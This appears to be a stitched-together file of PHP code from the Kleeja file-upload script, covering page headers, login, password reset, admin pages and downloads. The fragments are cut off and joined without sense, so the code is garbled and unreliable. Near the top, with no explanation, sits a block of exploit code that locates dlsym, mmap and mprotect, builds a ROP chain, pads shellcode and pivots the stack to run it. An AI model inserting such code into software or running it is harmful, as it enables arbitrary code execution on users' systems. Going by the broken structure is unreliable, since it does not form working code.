/**
* Print header part of the page
*
* @param string $title [optional] The page title
* @param string $extra_head_code [optional] any extra codes to include it between head tag
* @return void
*/
function kleeja_header($title = '', $extra_head_code = '')
{
global $user, $lang, $config, $extras, $plugin;
#is user ? and username
$username = $user->is_user() ? $user->data['name'] : $lang['GUST'];
#our default charset
$charset = 'utf-8';
#check for extra header
$extras['header'] = empty($extras['header']) ? false : $extras['header'];
($hook = $plugin->run_hook('kleeja_header_links_func')) ? eval($hook) : null;
//run hook
$current_page = ig('go') ? g('go', 'str') : (empty($_GET) ? 'index' : '');
//kleeja_add_form_key('login');
//$tpl->assign("action_login", 'ucp.php?go=login' . (isset($_GET['return']) ? '&return=' . htmlspecialchars($_GET['return']) : ''));
include get_template_path('header.php');
($hook = $plugin->run_hook('kleeja_header_func')) ? eval($hook) : null;
//run hook
flush();
}
$dlsym = getplt($addr, "_dlsym");
// get plt entry
nogc($dlsym);
$mmap_plt = getplt($addr, "_mmap");
// get plt entry
$mmap = r64(r32($mmap_plt + 2) + $mmap_plt + 6);
nogc($mmap);
$mprotect = gadget(findmhfromaddr($mmap), "b84a000002");
// find b84a000002 movl $0x200004a, %eax -> mprotect syscall
nogc($mprotect);
function ig($a, $b)
{
return ibuf(gadget($a, $b), 8);
}
$arg1 = ig($addr, "5fc3");
$arg2 = ig($addr, "5ec3");
$arg3 = ig(findmhfromaddr($mmap), "5ac3");
$stack = $arg1;
$stack .= w64($all['ptr'] & ~0xfff);
$stack .= $arg2;
$stack .= w64(4096 * 2);
$stack .= $arg3;
$stack .= w64(7);
$stack .= w64($mprotect);
$stack .= w64($all['ptr']);
$stack .= w64($dlsym);
$pad = str_repeat("z", 2048 + (0x10 - (strlen($shellcode) & 0xf)));
$payload = $shellcode . $pad . $stack;
memcpy($all, $payload);
jump(stackPivot($addr), ibuf(0, 8) . ibuf(0, 8) . ibuf(0, 8) . ig($addr, "5cc3") . ibuf($all['ptr'] + strlen($shellcode) + strlen($pad), 8));
if ($users->login($data['username'], $data['password'], $remember_me)) {
$show_form = false;
$show_after_login = true;
} else {
$ERRORS[] = 'The given information is incorrect!';
}
}
}
?>
<!-- you already in -->
<?php
if ($you_are_a_user) {
?>
<div class="alert alert-warning">
<?php
if (ig('logout')) {
?>
You logged out, <a href="./">[ home ]</a>
<?php
} else {
?>
You already logged-in, do you want to <a href="./login.php?logout=1">log out?
<?php
}
?>
</div>
<?php
}
?>
<!-- show the ERRORS -->
//run hook
break;
case 'get_pass':
#if not default system, let's give him a link for integrated script
if ($config['user_system'] != 1) {
$text = '<a href="' . (!empty($forgetpass_script_path) ? $forgetpass_script_path : $script_path) . '">' . $lang['LOST_PASS_FORUM'] . '</a>';
kleeja_info($text, $lang['PLACE_NO_YOU']);
}
#page info
$current_template = 'get_pass.php';
$current_title = $lang['GET_LOSTPASS'];
$action = 'ucp.php?go=get_pass';
#no error yet
$ERRORS = false;
# As in ucp.php?go=get_pass&activation_key=1af3405662ec373d672d003cf27cf998&uid=1
if (ig('activation_key') && ig('uid')) {
($hook = $plugin->run_hook('get_pass_activation_key')) ? eval($hook) : null;
//run hook
$h_key = preg_replace('![^a-z0-9]!', '', g('activation_key', 'str'));
$u_id = g('uid', 'int');
#if it's empty ?
if (trim($h_key) == '') {
big_error('No hash key', 'This is not a good link for activation ... Try again!');
}
$query = array('SELECT' => 'new_password', 'FROM' => "{$dbprefix}users", 'WHERE' => "hash_key='" . $SQL->escape($h_key) . "' AND id=" . $u_id);
($hook = $plugin->run_hook('get_pass_f_query')) ? eval($hook) : null;
//run hook
$result = $SQL->build($query);
if ($SQL->num($result)) {
$npass = $SQL->fetch($result);
$npass = $npass['new_password'];
big_error('Loading !', 'Error while loading: ' . $adm_extensions[$go_to] . '/' . $go_to);
}
($hook = $plugin->run_hook('end_admin_page')) ? eval($hook) : null;
//run hook
#no style defined
if (empty($current_template)) {
$text = 'THERE IS NO TEMPLATE ASSIGNED FOR THIS PAGE!';
$current_template = 'info.php';
}
$go_menu_html = '';
if (isset($go_menu)) {
foreach ($go_menu as $m => $d) {
$go_menu_html .= '<li class="' . ($d['current'] ? 'active' : '') . '" id="c_' . $d['goto'] . '"><a href="' . $d['link'] . '" onclick="' . (isset($d['confirm']) && $d['confirm'] ? 'javascript:return confirm_from();' : '') . '">' . $d['name'] . '</a></li>';
}
}
#header
if (!ig('_ajax_')) {
include get_template_path('header.php');
}
#body
if (!ig('_ajax_')) {
$is_ajax = 'no';
include get_template_path($current_template);
}
#footer
if (!ig('_ajax_')) {
include get_template_path('footer.php');
}
# at end
garbage_collection();
exit;
define('ADMIN_STYLE_PATH', $config['siteurl'] . 'admin/' . ADMIN_STYLE_NAME . '/');
define('ADMIN_STYLE_PATH_ABS', PATH . 'admin/' . ADMIN_STYLE_NAME . '/');
#get languge of common
get_lang('common');
#ban system
get_ban();
#install.php exists, raise a message
if (file_exists(PATH . 'install') && !defined('IN_ADMIN') && !defined('IN_LOGIN') && !defined('DEV_STAGE')) {
#Different message for admins! delete install folder
kleeja_info(user_can('enter_acp') ? $lang['DELETE_INSTALL_FOLDER'] : $lang['WE_UPDATING_KLEEJA_NOW'], $lang['SITE_CLOSED']);
}
#site close message if enabled
$login_page = '';
if ($config['siteclose'] == '1' && !user_can('enter_acp') && !defined('IN_LOGIN') && !defined('IN_ADMIN')) {
#if download, images ?
if (defined('IN_DOWNLOAD') && (ig('img') || ig('thmb') || ig('thmbf') || ig('imgf'))) {
@$SQL->close();
$fullname = "images/site_closed.jpg";
$filesize = filesize($fullname);
header("Content-length: {$filesize}");
header("Content-type: image/jpg");
readfile($fullname);
exit;
}
#Send a 503 HTTP response code to prevent search bots from indexing the maintenace message
header('HTTP/1.1 503 Service Temporarily Unavailable');
kleeja_info($config['closemsg'], $lang['SITE_CLOSED']);
}
#exceed total size
if ($stat_sizes >= $config['total_size'] * 1048576 && !defined('IN_LOGIN') && !defined('IN_ADMIN')) {
// Send a 503 HTTP response code to prevent search bots from indexing the maintenace message
$is_image = true;
} else {
#not exists file
($hook = $plugin->run_hook('not_exists_qr_down_file')) ? eval($hook) : null;
//run hook
kleeja_err($lang['FILE_NO_FOUNDED']);
}
}
#prevent bug, where you can download file, not image using imagef- url, bug:1134
if ((ig('img') || ig('thmb') || ig('thmbf') || ig('imgf')) && !$is_image) {
$f = 'images';
$n = 'not_exists.jpg';
$is_image = true;
}
#downalod porcess
$path_file = ig('thmb') || ig('thmbf') ? "./{$f}/thumbs/{$n}" : "./{$f}/{$n}";
$chunksize = 1024 * 120;
//1 kelobyte * 120 = 120kb that will send to user every loop
$resuming_on = true;
($hook = $plugin->run_hook('down_go_page')) ? eval($hook) : null;
//run hook
# this is a solution to ignore downloading through the file, redirecct to the actual file
# where you can add 'define("MAKE_DOPHP_301_HEADER", true);' in config.php to stop the load
# if there is any.
if (defined('MAKE_DOPHP_301_HEADER')) {
header('HTTP/1.1 301 Moved Permanently');
header('Location: ' . $path_file);
garbage_collection();
exit;
}
#unable to read the file?
$current_title = $lang['STATS'];
$current_template = 'stats.php';
$files_st = $stat_files;
$imgs_st = $stat_imgs;
$users_st = $stat_users;
$sizes_st = readable_size($stat_sizes);
$lst_reg = empty($stat_last_user) ? $lang['UNKNOWN'] : $stat_last_user;
$on_muoe = kleeja_date($on_muoe);
($hook = kleeja_run_hook('stats_go_page')) ? eval($hook) : null;
//run hook
break;
# Depreacted from 1rc6+, see do.php
# Depreacted from 1rc6+, see do.php
case 'down':
#go.php?go=down&n=$1&f=$2&i=$3
if (ig('n')) {
$url_file = $config['mod_writer'] == 1 ? $config['siteurl'] . 'download' . g('i', 'int') . '.html' : $config['siteurl'] . 'do.php?id=' . g('n', 'int');
} else {
$url_file = $config['siteurl'];
}
$SQL->close();
#redirect and exit
redirect($url_file, true, true);
break;
case 'resync':
#This is a part of ACP, only admins can access this part of page
if (!user_can('enter_acp')) {
kleeja_info($lang['HV_NOT_PRVLG_ACCESS']);
exit;
}
#get admin functions
